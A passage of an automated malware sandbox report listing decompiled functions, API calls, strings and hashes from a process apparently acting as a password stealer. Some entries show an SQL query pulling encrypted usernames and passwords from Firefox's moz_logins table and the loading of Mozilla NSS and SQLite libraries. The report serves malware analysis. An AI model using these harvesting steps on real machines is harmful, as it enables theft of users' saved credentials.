                                                                                                                                                                        Function 0040E9E8 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetClientRect.USER32 ref: 0040EA07
                                                                                                                                                                        • GetWindowRect.USER32 ref: 0040EA1D
                                                                                                                                                                        • GetWindowRect.USER32 ref: 0040EA33
                                                                                                                                                                        • GetDlgItem.USER32 ref: 0040EA6D
                                                                                                                                                                        • GetWindowRect.USER32 ref: 0040EA74
                                                                                                                                                                        • MapWindowPoints.USER32 ref: 0040EA84
                                                                                                                                                                        • BeginDeferWindowPos.USER32 ref: 0040EAA8
                                                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040EACB
                                                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040EAEA
                                                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040EB15
                                                                                                                                                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040EB2D
                                                                                                                                                                        • EndDeferWindowPos.USER32(?), ref: 0040EB32
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 552707033-0
                                                                                                                                                                        • Opcode ID: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
                                                                                                                                                                        • Instruction ID: dc3f1f52df5294a2ec978d0ae6c3ccd5c38b38754740f987f7490d1c54cf7de8
                                                                                                                                                                        • Opcode Fuzzy Hash: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 9141B275A00609BFEF11DFA8CD89FEEBBBAFB48304F100465E615A61A0C7716A50DB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A230 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040A401,?,?,*.*,0040A46B,00000000), ref: 0040A250
                                                                                                                                                                          • Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040A280
                                                                                                                                                                          • Part of subcall function 0040A19F: _memicmp.MSVCRT ref: 0040A1B9
                                                                                                                                                                          • Part of subcall function 0040A19F: memcpy.MSVCRT ref: 0040A1D0
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040A2C7
                                                                                                                                                                        • strchr.MSVCRT ref: 0040A2EC
                                                                                                                                                                        • strchr.MSVCRT ref: 0040A2FD
                                                                                                                                                                        • _strlwr.MSVCRT ref: 0040A30B
                                                                                                                                                                        • memset.MSVCRT ref: 0040A326
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A373
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                        • String ID: 4$h
                                                                                                                                                                        • API String ID: 4066021378-1856150674
                                                                                                                                                                        • Opcode ID: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
                                                                                                                                                                        • Instruction ID: 17f5db22f20d9ae327a0934dc0a50b98bc11baf633b6527cb3b89d44c7cb3914
                                                                                                                                                                        • Opcode Fuzzy Hash: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D31A271900218BFEB11EBA4CC85FEE77ACEB45354F10406AFA08E6181E7399F558B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413F4B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$_snwprintf
                                                                                                                                                                        • String ID: %%0.%df
                                                                                                                                                                        • API String ID: 3473751417-763548558
                                                                                                                                                                        • Opcode ID: 006428a89fa05684acf2644298e63651eb7cb4553425473b44fafabdd736af6e
                                                                                                                                                                        • Instruction ID: 0b838db9f825932711660ea6569b586705b9a26b63b1a47a63d1f68ae8ff407c
                                                                                                                                                                        • Opcode Fuzzy Hash: 006428a89fa05684acf2644298e63651eb7cb4553425473b44fafabdd736af6e
                                                                                                                                                                        • Instruction Fuzzy Hash: 86313271900129BBEB20DF55CC85FEB7B7CEF89304F0100EAF509A2112EB789A54CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004055D0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004055F3
                                                                                                                                                                        • KillTimer.USER32(?,00000041), ref: 00405603
                                                                                                                                                                        • KillTimer.USER32(?,00000041), ref: 00405614
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405637
                                                                                                                                                                        • GetParent.USER32(?), ref: 00405662
                                                                                                                                                                        • SendMessageW.USER32(00000000), ref: 00405669
                                                                                                                                                                        • BeginDeferWindowPos.USER32 ref: 00405677
                                                                                                                                                                        • EndDeferWindowPos.USER32(00000000), ref: 004056C7
                                                                                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004056D3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                        • String ID: A
                                                                                                                                                                        • API String ID: 2892645895-3554254475
                                                                                                                                                                        • Opcode ID: a5eb5b96462c3251e9a860f7e43a9a09c1a522a6715d8b372432c44450ed2e81
                                                                                                                                                                        • Instruction ID: 7dfccb24d1e076f690be31caf06a6d4f547633615caf0f8568b2f3749d1e3a55
                                                                                                                                                                        • Opcode Fuzzy Hash: a5eb5b96462c3251e9a860f7e43a9a09c1a522a6715d8b372432c44450ed2e81
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D317E75640B04BBEB201F659C85F6B7B6AFB44741F50883AF30A7A1E1C7F698908E58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E29C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 0040E378
                                                                                                                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 0040E2AC
                                                                                                                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040E319
                                                                                                                                                                        • <table dir="rtl"><tr><td>, xrefs: 0040E33C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                        • API String ID: 1283228442-2366825230
                                                                                                                                                                        • Opcode ID: c4fce1170840367a350b3e6d5f67ab6abb67d71c967fae5ab0e812931b85aba3
                                                                                                                                                                        • Instruction ID: dd7614801a102cad1738161c6781c4b5767366b5b9f47406b9b80e8d834f6cb8
                                                                                                                                                                        • Opcode Fuzzy Hash: c4fce1170840367a350b3e6d5f67ab6abb67d71c967fae5ab0e812931b85aba3
                                                                                                                                                                        • Instruction Fuzzy Hash: C82154B69002186BDB21EBA5CC45F9A77BCEF4D785F0440AAF50893151DB38DB848B59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413031 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • wcschr.MSVCRT ref: 0041304A
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0041305A
                                                                                                                                                                          • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
                                                                                                                                                                          • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
                                                                                                                                                                          • Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3
                                                                                                                                                                        • wcscpy.MSVCRT ref: 004130A9
                                                                                                                                                                        • wcscat.MSVCRT ref: 004130B4
                                                                                                                                                                        • memset.MSVCRT ref: 00413090
                                                                                                                                                                          • Part of subcall function 00408463: GetWindowsDirectoryW.KERNEL32(00453718,00000104,?,004130E9,?,?,00000000,00000208,-00000028), ref: 00408479
                                                                                                                                                                          • Part of subcall function 00408463: wcscpy.MSVCRT ref: 00408489
                                                                                                                                                                        • memset.MSVCRT ref: 004130D8
                                                                                                                                                                        • memcpy.MSVCRT ref: 004130F3
                                                                                                                                                                        • wcscat.MSVCRT ref: 004130FF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                        • String ID: \systemroot
                                                                                                                                                                        • API String ID: 4173585201-1821301763
                                                                                                                                                                        • Opcode ID: f2ab5198b6a2690fa1a836c34b2ef13a361ad9faede40cdf7fdb84fd41dd5d52
                                                                                                                                                                        • Instruction ID: 36f3f6f0360cce9f0c7183545ae4e1e5b3fba08c84210a6b9e93ac32fafd8b1c
                                                                                                                                                                        • Opcode Fuzzy Hash: f2ab5198b6a2690fa1a836c34b2ef13a361ad9faede40cdf7fdb84fd41dd5d52
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A21D7B640530469E721EBB19C86FEB63EC9F46715F20415FB115A2082FB7CAA84475E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040744D Relevance: 16.8, APIs: 10, Strings: 1, Instructions: 251stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00443A61: memset.MSVCRT ref: 00443A8C
                                                                                                                                                                          • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AA3
                                                                                                                                                                          • Part of subcall function 00443A61: memset.MSVCRT ref: 00443AD6
                                                                                                                                                                          • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AEC
                                                                                                                                                                          • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443AFD
                                                                                                                                                                          • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B23
                                                                                                                                                                          • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B34
                                                                                                                                                                          • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B5B
                                                                                                                                                                          • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B6C
                                                                                                                                                                          • Part of subcall function 00443A61: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
                                                                                                                                                                          • Part of subcall function 00443A61: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
                                                                                                                                                                          • Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
                                                                                                                                                                          • Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB
                                                                                                                                                                        • memset.MSVCRT ref: 0040748C
                                                                                                                                                                          • Part of subcall function 00408C5E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,00402A35,?,?), ref: 00408C77
                                                                                                                                                                        • memset.MSVCRT ref: 0040750B
                                                                                                                                                                        • memset.MSVCRT ref: 00407520
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040765C
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407672
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407688
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040769E
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076B4
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076CA
                                                                                                                                                                        • memset.MSVCRT ref: 004076E0
                                                                                                                                                                        Strings
                                                                                                                                                                        • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins, xrefs: 004074D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
                                                                                                                                                                        • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins
                                                                                                                                                                        • API String ID: 2096775815-1337997248
                                                                                                                                                                        • Opcode ID: 2e12d6ea0480d97641cb46f238cf2080cd592d40d485f85ffcf83cfd2d87e7a7
                                                                                                                                                                        • Instruction ID: 3c2b171134edc849c89bfde98875369ff40149e6fc896e2c8c158776e68e1888
                                                                                                                                                                        • Opcode Fuzzy Hash: 2e12d6ea0480d97641cb46f238cf2080cd592d40d485f85ffcf83cfd2d87e7a7
                                                                                                                                                                        • Instruction Fuzzy Hash: 61912A72C0425EAFDF10DF94DC819DEBBB4EF04315F10406BE505B2191EA39AA94CB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00417F9B Relevance: 16.6, APIs: 11, Instructions: 88COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
                                                                                                                                                                        • malloc.MSVCRT ref: 00417FD2
                                                                                                                                                                        • free.MSVCRT(?), ref: 00417FE2
                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00417FF6
                                                                                                                                                                        • free.MSVCRT(?), ref: 00417FFB
                                                                                                                                                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00418011
                                                                                                                                                                        • malloc.MSVCRT ref: 00418019
                                                                                                                                                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041802C
                                                                                                                                                                        • free.MSVCRT(?), ref: 00418031
                                                                                                                                                                        • free.MSVCRT(?), ref: 00418045
                                                                                                                                                                        • free.MSVCRT(00000000,0044C838,00000000), ref: 00418064
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3356672799-0
                                                                                                                                                                        • Opcode ID: 4281f6dcf499aebe880315d56d8890ea297e638ba0a2e688ee01e2e55a4b7441
                                                                                                                                                                        • Instruction ID: e19f7d1979d0248284e652c075024004b82b0c137a295abbe9fd7512c3376d02
                                                                                                                                                                        • Opcode Fuzzy Hash: 4281f6dcf499aebe880315d56d8890ea297e638ba0a2e688ee01e2e55a4b7441
                                                                                                                                                                        • Instruction Fuzzy Hash: AA218675904118BFEF10BBA5EC46CDF7FB9DF41398B22016BF404A2161DE395E819968
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407F9A Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EmptyClipboard.USER32 ref: 00407FA4
                                                                                                                                                                          • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00407FC1
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407FD2
                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00407FDF
                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407FF2
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00408004
                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 0040800D
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00408015
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00408021
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040802C
                                                                                                                                                                        • CloseClipboard.USER32 ref: 00408035
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3604893535-0
                                                                                                                                                                        • Opcode ID: df7f886e945f591bfda75065e4edf3e41638ed4f771c2343fc9f9f7254ae204e
                                                                                                                                                                        • Instruction ID: 9cea1fd89fc17267dcd3af91661d4008ede421ba1dc4d9805cb8839a0273d96b
                                                                                                                                                                        • Opcode Fuzzy Hash: df7f886e945f591bfda75065e4edf3e41638ed4f771c2343fc9f9f7254ae204e
                                                                                                                                                                        • Instruction Fuzzy Hash: 71113D7A900A04FBDF105FB0ED4CB9E7BB8EB45365F100176F942E52A2DB748904DB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004144DA Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscpy
                                                                                                                                                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                        • API String ID: 1284135714-318151290
                                                                                                                                                                        • Opcode ID: bfadb20ff740d820eb56dcb57501d1229147ac2dc18d3832aa90891d3b4f6c13
                                                                                                                                                                        • Instruction ID: 0ebae4f713cd0728fe49c3fef23c10be13eea51f6af137ba8aced86fbfd041bd
                                                                                                                                                                        • Opcode Fuzzy Hash: bfadb20ff740d820eb56dcb57501d1229147ac2dc18d3832aa90891d3b4f6c13
                                                                                                                                                                        • Instruction Fuzzy Hash: 59F0BBB169462D73342E25B85806AF70483F0C1B0537E45537702EA6D6EA4CCAC1E89F
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B478 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                        • String ID: 0$6
                                                                                                                                                                        • API String ID: 4066108131-3849865405
                                                                                                                                                                        • Opcode ID: b79568a4bc0d31f153f724f739672314f24d182ceeaf87f3ebd535909d0644a4
                                                                                                                                                                        • Instruction ID: bceec671b1c8862383177497c079c71e13407bcb6d3a60011dae78a89f936b1e
                                                                                                                                                                        • Opcode Fuzzy Hash: b79568a4bc0d31f153f724f739672314f24d182ceeaf87f3ebd535909d0644a4
                                                                                                                                                                        • Instruction Fuzzy Hash: 65315BB2408340AFDB109F95DC44A9BB7E8FF89318F00487FF948A2291D779D905CB9A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403C8C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
                                                                                                                                                                        • #17.COMCTL32(?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CDF
                                                                                                                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                        • API String ID: 2780580303-317687271
                                                                                                                                                                        • Opcode ID: 66f0956d2bdd33e57a9d75159f698099ad879889c70df319cc2ace5e9580e212
                                                                                                                                                                        • Instruction ID: 34266bbb316567afe830504356b8b6584aa457591d2bf79f0dcd5bedfca56d80
                                                                                                                                                                        • Opcode Fuzzy Hash: 66f0956d2bdd33e57a9d75159f698099ad879889c70df319cc2ace5e9580e212
                                                                                                                                                                        • Instruction Fuzzy Hash: B801D676754B116BEB215F649C89B6B7D9CEF42B4AB004039F502F2181DAB8DE0196A8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041171B Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 0041172A
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(sqlite3.dll,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 00411733
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 0041173C
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 0041174B
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 00411752
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 00411759
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeHandleLibraryModule
                                                                                                                                                                        • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                                                                                                        • API String ID: 662261464-3550686275
                                                                                                                                                                        • Opcode ID: 0ba152906d568cc671e1b6f9d2e794e6ae63ac90640bfd5e0f9cb05d093c3698
                                                                                                                                                                        • Instruction ID: e2ab39130582ef49d5f09875a9cbab8dc3c3c45014a759ddc4c6379760142a6f
                                                                                                                                                                        • Opcode Fuzzy Hash: 0ba152906d568cc671e1b6f9d2e794e6ae63ac90640bfd5e0f9cb05d093c3698
                                                                                                                                                                        • Instruction Fuzzy Hash: 7AE04F66F4136DA79A1027F66C84EAB6F5CC896AA13150037AF05A33519EA89C018AF9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004440EA Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
